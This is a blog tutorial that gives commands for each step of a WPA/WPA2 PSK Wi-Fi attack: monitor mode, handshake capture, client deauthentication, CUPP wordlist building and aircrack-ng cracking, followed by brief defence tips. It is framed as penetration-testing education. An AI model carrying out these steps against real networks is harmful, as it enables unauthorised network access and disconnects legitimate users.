Skip to main content

How to Hack a Wi-Fi Network: WPA/WPA2 PSK Attack Methodology



Wi-Fi hacking is often synonymous with WPA/WPA2 PSK attacks, one of the most popular ways hackers attempt to compromise wireless networks. These attacks take advantage of weak pre-shared keys (passwords) by capturing a crucial piece of data known as the 4-way handshake during the network authentication process. Once captured, this data can be cracked using dictionary or brute-force attacks to reveal the network's password. The attack methodology involves several steps, starting from identifying the target network, capturing traffic, and forcing devices on the network to disconnect (using a deauthentication attack), all the way to cracking the captured handshake with tools like aircrack-ng. By generating custom wordlists with tools like CUPP and rsmangler, attackers can tailor their brute-force attempts to the specific target. This guide will walk you through the entire process, detailing the tools, techniques, and commands used, while also explaining how to secure your own network against such attacks.

Understanding how these attacks work is important not just for penetration testers and ethical hackers but for anyone looking to improve their cybersecurity defences. By gaining insight into how attackers operate, you can better protect your own network from vulnerabilities. Now, let's dive into the detailed steps for executing a WPA/WPA2 PSK attack.

Step-by-Step: WPA/WPA2 PSK Attack Methodology

Step 1: Checking Your Wi-Fi Adapter

To start, you need a Wi-Fi adapter that supports monitor mode and packet injection. Without this, you won't be able to capture the traffic needed for a successful attack. First, check if your adapter is available and compatible by running the iwconfig command.

iwconfig

iwconfig 
This command will show the available network interfaces. Look for your wireless adapter (often listed as wlan0) and ensure it's recognized.

Step 2: Kill Interfering Processes

To ensure the Wi-Fi adapter can operate in monitor mode, you need to disable any processes that might interfere with it, such as NetworkManager. This step is crucial to ensure a clean and smooth traffic capture.

sudo airmon-ng check kill


This command terminates processes that could interfere with the monitor mode. It will help avoid any conflicts when you try to capture Wi-Fi traffic.

Step 3: Enable Monitor Mode

Once processes have been stopped, you can enable monitor mode on your Wi-Fi adapter. This allows you to listen to all traffic on the specified channel, including traffic that isn't meant for your device.

airmon-ng start wlan0


This command puts your wireless adapter into monitor mode, a prerequisite for capturing data packets from the network.

Step 4: Scan for Available Wi-Fi Networks

With your adapter in monitor mode, the next step is to scan for available Wi-Fi networks and identify your target. You can do this using airodump-ng, which will display all nearby networks along with their encryption types, channels, and other relevant data.

airodump-ng wlan0mon



The output of this command will display a list of all detected Wi-Fi networks. Take note of the BSSID (the MAC address of the router), the channel number, and the ESSID (network name) of the target network.

Step 5: Capture Traffic from the Target Network

Now that you've identified your target network, focus the traffic capture on that specific network. This will help you capture the 4-way handshake during the authentication process when a device connects to the network.

airodump-ng wlan0mon --channel 3 --essid "LESS SECURE WIFI" \
--bssid 5C:A6:E6:[REDACTED] --band bg -w less-secure


In this command:
  •   --channel 3  tells  airodump-ng to focus on channel 3.
  • --essid "LESS SECURE WIFI" specifies the target network name.
  • --bssid 5C:A6:E6:[REDACTED] is the MAC address of the target access point.
  • -w less-secure saves the captured data to a file called less-secure-01.cap.
The goal here is to capture the 4-way handshake when a device connects to the network. To expedite this process, you may need to force a device on the network to reconnect using a deauthentication attack.

Step 6: Deauthenticating Clients

A deauthentication attack is used to disconnect a client from the Wi-Fi network, forcing it to reconnect. When the client reconnects, it will exchange the 4-way handshake, which you can then capture.

aireplay-ng -0 1 -a 5C:A6:E6:[REDACTED] -c 8A:97:20:[REDACTED] wlan0mon

In this command:
  • -0 1 sends a single deauthentication packet.
  • -a 5C:A6:E6:[REDACTED] is the BSSID of the target AP (router).
  • -c 8A:97:20:[REDACTED] is the MAC address of the client to be disconnected.
If the network is not using Management Frame Protection (MFP), this will force the client to reconnect, generating the 4-way handshake. If MFP is enabled, deauthentication attacks will not work, and you’ll need to wait for a client to reconnect naturally.

Step 7: Confirm Handshake Capture

After the client reconnects, you should have captured the 4-way handshake. The .cap file is the most important one for us at this point.

ls -l less-secure-01.cap


This file will contain the handshake data, which is essential for cracking the password.

Step 8: Create a Custom Wordlist Using CUPP

To crack the Wi-Fi password, you need a wordlist. A common tactic is to use CUPP (Common User Password Profiler) to generate a customized wordlist based on user-specific data.
Start by creating a basic wordlist:

cat wordlist.txt

less secure
less-secure.com
wifi
password
secret


Next, run CUPP to expand this wordlist:

cupp -w wordlist.txt


CUPP will generate a more extensive wordlist based on the initial inputs, which will increase your chances of cracking the password.

Step 9: Crack the Password

With the handshake captured and your custom wordlist ready, you can now attempt to crack the password using aircrack-ng.

aircrack-ng -w wordlist.txt.cupp.txt -e "LESS SECURE WIFI" \
-b 5C:A6:E6:[REDACTED] less-secure-01.cap


In this command:
  • -w wordlist.txt.cupp.txt specifies the custom wordlist generated by CUPP.
  • -e "LESS SECURE WIFI" is the network's ESSID (name).
  • -b 5C:A6:E6:[REDACTED] is the BSSID (MAC address) of the target access point.
  • less-secure-01.cap is the capture file containing the handshake.
If the password is present in the wordlist, aircrack-ng will display the cracked password.

Step 10: Stop Monitor Mode and Restart Network Services

Once you're done, restore your Wi-Fi adapter to its normal mode and restart any services that were stopped earlier.

1. Stop monitor mode:
airmon-ng stop wlan0mon


2. Restart NetworkManager:
systemctl restart NetworkManager


This will return your network connectivity to normal.

How to Protect Your Network from WPA/WPA2 PSK Attacks

  1. Use WPA3 Encryption: WPA3 provides much stronger security and is resistant to many of the attacks used against WPA2 networks.
  2. Strong, Unique Passwords: Avoid common passwords or predictable patterns. Use long, random passwords with a mix of letters, numbers, and symbols.
  3. Enable MFP (Management Frame Protection): This feature helps protect against deauthentication attacks.


This Article Was Sponsored By:
TwelveSec Logo








Popular posts from this blog

Open eClass – CVE-2024-26503: Unrestricted File Upload Leads to Remote Code Execution

During an assessment, I identified a severe security vulnerability within Open eClass, an e-learning platform extensively utilized across educational institutions, notably within Greece, where it is deployed by virtually all Greek Universities and educational entities. Open eClass, developed by GUnet (Greek Universities Network), is instrumental in delivering asynchronous e-learning services. The vulnerability, cataloged under CVE-2024-26503, involves an unrestricted file upload flaw that enables remote code execution (RCE), impacting versions 3.15 and earlier of the platform. This critical security lapse presents a significant risk, potentially allowing unauthorized access and control over the system, thereby compromising the integrity and security of the educational infrastructure. Affected Versions: ●   version <=  3.15 CVSSv3.1 Base Score: 9.1 ( Critical ) CVSSv3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H Exploitation Guide The vulnerability can be exploited

How I Use Obsidian for Penetration Testing, CVE Hunting, and Studying

In the ever-evolving realm of cyber security, the tools and techniques at our disposal are as varied as the threats we aim to counteract. Among these tools, note-taking applications play a pivotal role, not just in organizing our thoughts but in streamlining our entire workflow. Today, I'm excited to share how Obsidian, a tool I embraced over two and a half years ago while preparing for my eJPT exam, has become an indispensable ally in my journey through penetration testing, CVE hunting, and continuous learning. If you're not yet familiar with Obsidian, it's a robust note-taking application that operates on a local collection of plain text Markdown files. What sets it apart is its capability to interlink ideas, forming an expansive web of knowledge that is both intuitive and comprehensive to explore. Through considerable customization, I've developed what I consider to be an ideal method for consolidating notes, insights, and projects into a unified workspace. Here'

Chamilo LMS: CVE-2024-27524 & CVE-2024-27525

CVE-2024-27524:  Stored XSS in tickets Severity:  High  (Base Score  7.1 ) CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H   Mitigation: Upgrade to Chamilo LMS 1.11.28 and above. Patch:  https://github.com/chamilo/chamilo-lms/commit/53275c152275958b33a1f87a21843daa52fb543a CVE-2024-27525:  Self XSS in social network Base Score:  Medium  (Base Score  4.6 ) CVSS Vector:  CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L Mitigation: Upgrade to Chamilo LMS 1.11.28 and above. Patch:  https://github.com/chamilo/chamilo-lms/commit/a63e03ef961e7bf2dab56f4ede6f87edef40ba0c Overview This advisory covers the discovery of two vulnerabilities within Chamilo LMS, an open-source learning management system (LMS) widely used across educational institutions. These vulnerabilities—stored cross-site scripting (Stored XSS) and self-cross-site scripting (Self XSS)—pose different levels of security risks but highlight critical considerations for secure system administration and user protection. Summary